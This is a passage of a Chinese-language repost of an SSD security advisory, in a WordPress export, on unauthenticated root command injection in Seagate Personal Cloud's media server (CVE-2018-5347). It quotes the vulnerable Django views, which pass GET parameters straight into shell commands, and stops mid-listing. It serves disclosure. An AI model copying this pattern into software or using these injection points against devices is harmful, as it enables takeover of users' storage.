{"id":11198,"date":"2018-01-22T14:19:30","date_gmt":"2018-01-22T22:19:30","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/22\/news-4969\/"},"modified":"2018-01-22T14:19:30","modified_gmt":"2018-01-22T22:19:30","slug":"news-4969","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/01\/22\/news-4969\/","title":{"rendered":"SSD\u5b89\u5168\u516c\u544a-\u5e0c\u6377\u4e2a\u4eba\u4e91\u5b58\u50a8\u8bbe\u5907\u591a\u4e2a\u6f0f\u6d1e"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 22 Jan 2018 12:07:17 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3648\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3648');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>\u6f0f\u6d1e\u6982\u8981<\/strong><br \/> \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e24\u4e2a\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002<\/p>\n<p>\u5e0c\u6377\u4e2a\u4eba\u4e91\u5bb6\u5ead\u5a92\u4f53\u5b58\u50a8\u8bbe\u5907\u662f\u201c\u5b58\u50a8\uff0c\u6574\u7406\uff0c\u6d41\u5f0f\u4f20\u8f93\uff0c\u5171\u4eab\u6240\u6709\u97f3\u4e50\uff0c\u7535\u5f71\uff0c\u7167\u7247\u548c\u91cd\u8981\u6587\u6863\u7684\u6700\u7b80\u5355\u7684\u65b9\u5f0f\u201d\u3002<\/p>\n<p><span id=\"more-3648\"><\/span><\/p>\n<p><strong>\u6f0f\u6d1e\u63d0\u4ea4\u8005<\/strong><br \/> \u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u4eba\u5458Yorick Koster\u5411 Beyond Security \u7684 SSD 
\u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e\u3002<\/p>\n<p><strong>\u5382\u5546\u54cd\u5e94<\/strong><br \/> \u5e0c\u6377\u572810\u670816\u65e5\u88ab\u544a\u77e5\u8be5\u6f0f\u6d1e\uff0c\u867d\u7136\u5df2\u786e\u8ba4\u6536\u5230\u6f0f\u6d1e\u4fe1\u606f\uff0c\u4f46\u62d2\u7edd\u56de\u5e94\uff08\u6211\u4eec\u7ed9\u51fa\u7684\uff09\u6280\u672f\u7ec6\u8282\uff0c\u4e5f\u6ca1\u6709\u7ed9\u51fa\u786e\u5b9a\u7684\u4fee\u590d\u65f6\u95f4\u6216\u662f\u534f\u8c03\u62a5\u544a\u3002<\/p>\n<p>CVE\uff1aCVE-2018-5347<\/p>\n<p><strong>\u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f<\/strong><br \/> Seagate Media Server\u4f7f\u7528Django Web\u6846\u67b6\u5e76\u6620\u5c04\u5230.psp\u6269\u5c55\u540d\u3002<\/p>\n<p>\u4efb\u4f55\u4ee5.psp\u7ed3\u5c3e\u7684URL\u90fd\u4f1a\u4f7f\u7528FastCGI\u534f\u8bae\u81ea\u52a8\u53d1\u9001\u5230Seagate Media Server\u5e94\u7528\u7a0b\u5e8f\u3002<\/p>\n<p>\/etc\/lighttpd\/conf.d\/django-host.conf:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a666371ac355404077478\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> fastcgi.server += (  &#8220;.psp&#8221;=&gt;     ((        &#8220;socket&#8221; =&gt; &#8220;\/var\/run\/manage_py-fastcgi.socket&#8221;,        &#8220;check-local&#8221; =&gt; &#8220;disable&#8221;,        &#8220;stream-post&#8221; =&gt; &#8220;enable&#8221;,        &#8220;allow-x-send-file&#8221; =&gt; &#8220;enable&#8221;,     )),  &#8220;.psp\/&#8221;=&gt;     ((        &#8220;socket&#8221; =&gt; &#8220;\/var\/run\/manage_py-fastcgi.socket&#8221;,        &#8220;check-local&#8221; =&gt; &#8220;disable&#8221;,        &#8220;stream-post&#8221; =&gt; &#8220;enable&#8221;,        &#8220;allow-x-send-file&#8221; =&gt; &#8220;enable&#8221;,     ))  )<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  
<\/p>\n<p>URL\u88ab\u6620\u5c04\u5230\u6587\u4ef6\/usr\/lib\/django_host\/seagate_media_server\/urls.py\u4e2d\u7279\u5b9a\u7684views\u3002<\/p>\n<p>\u6709\u4e24\u4e2aviews\u53d7\u5230\u672a\u7ecf\u8ba4\u8bc1\u7684\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002<\/p>\n<p>\u53d7\u5f71\u54cd\u7684views\u662f\uff1a<\/p>\n<ul>\n<li>uploadTelemetry<\/li>\n<li>getLogs<\/li>\n<\/ul>\n<p>\u8fd9\u4e9bviews\u4eceGET\u53c2\u6570\u83b7\u53d6\u7528\u6237\u8f93\u5165\uff0c\u5e76\u5c06\u8fd9\u4e9b\u672a\u7ecf\u9a8c\u8bc1\/\u89e3\u6790\u7684\u53c2\u6570\u62fc\u63a5\u8fdb\u547d\u4ee4\u5b57\u7b26\u4e32\uff0c\u4f20\u9012\u7ed9Python commands\u6a21\u5757\u7684\u51fd\u6570\uff08commands.getoutput\u548ccommands.getstatusoutput\uff09\uff0c\u7531shell\u6267\u884c\u3002<\/p>\n<p>\u8fd9\u5141\u8bb8\u653b\u51fb\u8005\u6ce8\u5165\u4efb\u610f\u7684\u7cfb\u7edf\u547d\u4ee4\uff0c\u8fd9\u4e9b\u547d\u4ee4\u5c06\u4ee5root\u6743\u9650\u6267\u884c\u3002<\/p>\n<p>\/usr\/lib\/django_host\/seagate_media_server\/views.py\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a666371ac35d480135754\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div 
class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> @csrf_exempt  def uploadTelemetry(request):     ts = request.GET.get(&#8216;TimeStamp&#8217;,&#8221;)     if (checkDBSQLite()) :        response = &#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;,&#8221;code&#8221;:&#8221;80&#8243;,&#8221;message&#8221;:&#8221;The Database has not been initialized or mounted yet!&#8221;}&#8217;     else :        if ts == &#8220;&#8221;:           response = &#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;,&#8221;code&#8221;:&#8221;380&#8243;,&#8221;message&#8221;:&#8221;TimeStamp parameter missing&#8221;}&#8217;           return HttpResponse(response);        cmd = &#8220;\/usr\/local\/bin\/log_telemetry &#8220;+str(ts)        commands.getoutput(cmd)     return HttpResponse(&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;}&#8217;)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac35d480135754-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac35d480135754-2\">2<\/div>\n<div 
class=\"crayon-num\" data-line=\"crayon-5a666371ac35d480135754-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac35d480135754-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac35d480135754-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac35d480135754-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac35d480135754-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac35d480135754-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac35d480135754-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac35d480135754-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac35d480135754-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac35d480135754-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a666371ac35d480135754-1\"><span class=\"crayon-sy\">@<\/span><span class=\"crayon-e\">csrf_exempt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac35d480135754-2\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">uploadTelemetry<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac35d480135754-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">ts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">GET<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;TimeStamp&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac35d480135754-4\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">checkDBSQLite<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac35d480135754-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;,&#8221;code&#8221;:&#8221;80&#8243;,&#8221;message&#8221;:&#8221;The Database has not been initialized or mounted yet!&#8221;}&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac35d480135754-6\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac35d480135754-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac35d480135754-8\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;,&#8221;code&#8221;:&#8221;380&#8243;,&#8221;message&#8221;:&#8221;TimeStamp parameter missing&#8221;}&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac35d480135754-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac35d480135754-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/usr\/local\/bin\/log_telemetry &#8220;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ts<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac35d480135754-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">commands<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getoutput<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac35d480135754-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;}&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0015 seconds] -->  <\/p>\n<p>\/usr\/lib\/django_host\/seagate_media_server\/views.py:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a666371ac361662785131\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div 
class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> @csrf_exempt  def getLogs (request):     try:        cmd_base=&#8217;\/usr\/bin\/log-extract-manager.sh&#8217;        uID = request.GET.get ( &#8216;arch_id&#8217;, None )        time_stamp = request.GET.get ( &#8216;time_stamp&#8217;, &#8221; )             if uID:           (status, output) = commands.getstatusoutput(cmd_base + &#8216; status &#8216; + uID);           if (&#8216;In progress&#8217; in output) and (uID in output) :              return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;status&#8221;:&#8221;In Progress&#8221;}}&#8217;)           elif (status == 0) :              return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;url&#8221;:&#8221;%s&#8221;, &#8220;fileSize&#8221;:&#8221;%d&#8221;}}&#8217; % ( urllib.quote(output.encode(&#8216;utf-8&#8217;)), os.path.getsize(output) ))           else :              return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;853&#8243;,&#8221;message&#8221;:&#8221;Id not recognized.&#8221;}&#8217; )        else:           (status, output) = commands.getstatusoutput(cmd_base + &#8216; start &#8216; + time_stamp);           if (status == 0) :              return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;archiveID&#8221;:&#8221;%s&#8221;}}&#8217; % (output))             return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;852&#8243;,&#8221;message&#8221;:&#8221;Zip file not created.&#8221;}&#8217; )     except :        return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;852&#8243;,&#8221;message&#8221;:&#8221;Zip 
file not created.&#8221;}&#8217; )<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-18\">18<\/div>\n<div 
class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a666371ac361662785131-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a666371ac361662785131-23\">23<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-1\"><span class=\"crayon-sy\">@<\/span><span class=\"crayon-e\">csrf_exempt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-2\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">getLogs<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cmd_base<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;\/usr\/bin\/log-extract-manager.sh&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">uID<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">GET<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;arch_id&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">None<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">time_stamp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">GET<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;time_stamp&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-7\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">uID<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a666371ac361662785131-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">commands<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getstatusoutput<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd_base<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216; status &#8216;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">uID<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a666371ac361662785131-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;In progress&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> 